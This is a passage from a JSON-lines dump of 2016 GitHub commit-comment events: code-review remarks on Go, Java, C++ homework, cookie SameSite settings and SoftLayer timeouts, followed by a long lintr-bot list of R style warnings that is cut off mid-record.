{"id":"4603937965","type":"CommitCommentEvent","actor":{"login":"jovo"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":19134011,"position":null,"line":null,"path":null,"commit_id":"f82502aa821e4c74c8fda0fa3a6ca9abf22e337c","created_at":"2016-09-22T17:34:03Z","updated_at":"2016-09-22T17:34:03Z","body":"https://github.com/neurodata/discriminability/\n\n\n\nOn Wed, Sep 21, 2016 at 4:09 PM, Jesse Leigh Patsolic <\nnotifications@github.com> wrote:\n\n> @jovo <https://github.com/jovo> Here's the html\n> <http://docs.neurodata.io/synaptome-stats/Code/Discrimination.html>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/neurodata/synaptome-stats/commit/f82502aa821e4c74c8fda0fa3a6ca9abf22e337c#commitcomment-19119881>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACjch0x2H94J2gftc1JxDuxxyyw6LsMks5qsY7vgaJpZM4KDOZT>\n> .\n>\n\n\n\n-- \nthe glass is all full:  half water, half air.\nneurodata.io, jovo calendar\n<https://calendar.google.com/calendar/embed?src=joshuav%40gmail.com&ctz=America/New_York>\n"}},"created_at":"2016-09-22T17:34:03Z"}
{"id":"4603938948","type":"CommitCommentEvent","actor":{"login":"jvehent"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19134012,"position":55,"line":477,"path":"certificate/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T17:34:13Z","updated_at":"2016-09-22T17:34:13Z","body":"In Go, `return` without arguments will return the variables defined in the function signature. In this case, `return` means `return xcert, err`."}},"created_at":"2016-09-22T17:34:13Z"}
{"id":"4603939250","type":"CommitCommentEvent","actor":{"login":"kkaravitis"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19134015,"position":50,"line":92,"path":"portlet-parent/wicketstuff-portlet/src/main/java/org/apache/wicket/portlet/PortletUrlRenderer.java","commit_id":"dfcd0bcf5747c82e969ff02a1a6555637c22fbd4","created_at":"2016-09-22T17:34:16Z","updated_at":"2016-09-22T17:34:16Z","body":"Thanks for the info!\r\n I am replacing now the String#replace(CharSequence, CharSequence)  with Strings.replaceAll() and I will open a pull request soon"}},"created_at":"2016-09-22T17:34:16Z"}
{"id":"4603940614","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134018,"position":3,"line":3,"path":"homework_4_1.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:34:31Z","updated_at":"2016-09-22T17:34:31Z","body":"вы всюду пользуетесь размером стека - 10 элементов - если вам например потребуется поменять размер с 10 на 15, то вы будете вынуждены поменять его везде. Лучше завести константу:\r\n\r\n#define SIZE 10\r\n\r\nи использовать ее, чтобы менять только в одном месте"}},"created_at":"2016-09-22T17:34:31Z"}
{"id":"4603943410","type":"CommitCommentEvent","actor":{"login":"ldesplat"},"repo":{"name":"hapijs/bell"},"payload":{"comment":{"id":19134028,"position":4,"line":108,"path":"lib/index.js","commit_id":"705e1d0a9495dbcfd66df820487cb0a3d1533103","created_at":"2016-09-22T17:35:01Z","updated_at":"2016-09-22T17:35:01Z","body":"It's documented here https://github.com/hapijs/bell/issues/264\r\n\r\nThe gist of it, is that it did not work with Chrome in non-incognito mode even after cleaning all the cache and cookies and such. For some reason, chrome refused to send the cookie. Only browser that did in my tests. I don't mind somebody trying to replicate that and tell me I missed something obvious."}},"created_at":"2016-09-22T17:35:01Z"}
{"id":"4603945901","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19134037,"position":56,"line":56,"path":"session/xmlrpc.go","commit_id":"9e28558d8c983c6364d489969c5b06c27e7a307a","created_at":"2016-09-22T17:35:28Z","updated_at":"2016-09-22T17:35:28Z","body":"@renier Should `Timeout` be defined here, or in `Session`?  I think it is applicable to REST transport also (and could be sourced from the local .softlayer file and/or the `SL_API_TIMEOUT` environment variable."}},"created_at":"2016-09-22T17:35:28Z"}
{"id":"4603948617","type":"CommitCommentEvent","actor":{"login":"ldesplat"},"repo":{"name":"hapijs/bell"},"payload":{"comment":{"id":19134043,"position":4,"line":108,"path":"lib/index.js","commit_id":"705e1d0a9495dbcfd66df820487cb0a3d1533103","created_at":"2016-09-22T17:35:58Z","updated_at":"2016-09-22T17:35:58Z","body":"Maybe it saw my previous 'Strict' cookie and I did not reset properly? I would love to put it to Lax since it worked great with the 5 providers and browsers I tested."}},"created_at":"2016-09-22T17:35:58Z"}
{"id":"4603949118","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134046,"position":6,"line":6,"path":"homework_4_1.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:36:04Z","updated_at":"2016-09-22T17:36:04Z","body":"эта функция должна возвращать число - максимальный элемент - а за печать на экране будет отвечать совсем другое место."}},"created_at":"2016-09-22T17:36:04Z"}
{"id":"4603955133","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134058,"position":15,"line":15,"path":"homework_4_1.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:37:08Z","updated_at":"2016-09-22T17:37:08Z","body":"вы повторяете ошибку коллеги. дело в том, что printf() возвращате количество напечатанных байт, а вовсе не верхний элемент стека. Да и за печать функция top() отвечать не должна."}},"created_at":"2016-09-22T17:37:08Z"}
{"id":"4603959337","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19134070,"position":13,"line":13,"path":"Home_Work_warm_up.py","commit_id":"732ad3c9feff19500baf24721d195dd58992fb25","created_at":"2016-09-22T17:37:53Z","updated_at":"2016-09-22T17:37:53Z","body":"you can takeep a look at \r\n'enumerate' official documentation to get rid of i increment"}},"created_at":"2016-09-22T17:37:53Z"}
{"id":"4603960564","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19134076,"position":null,"line":null,"path":null,"commit_id":"3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033","created_at":"2016-09-22T17:38:04Z","updated_at":"2016-09-22T17:38:04Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/drawLocal.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = 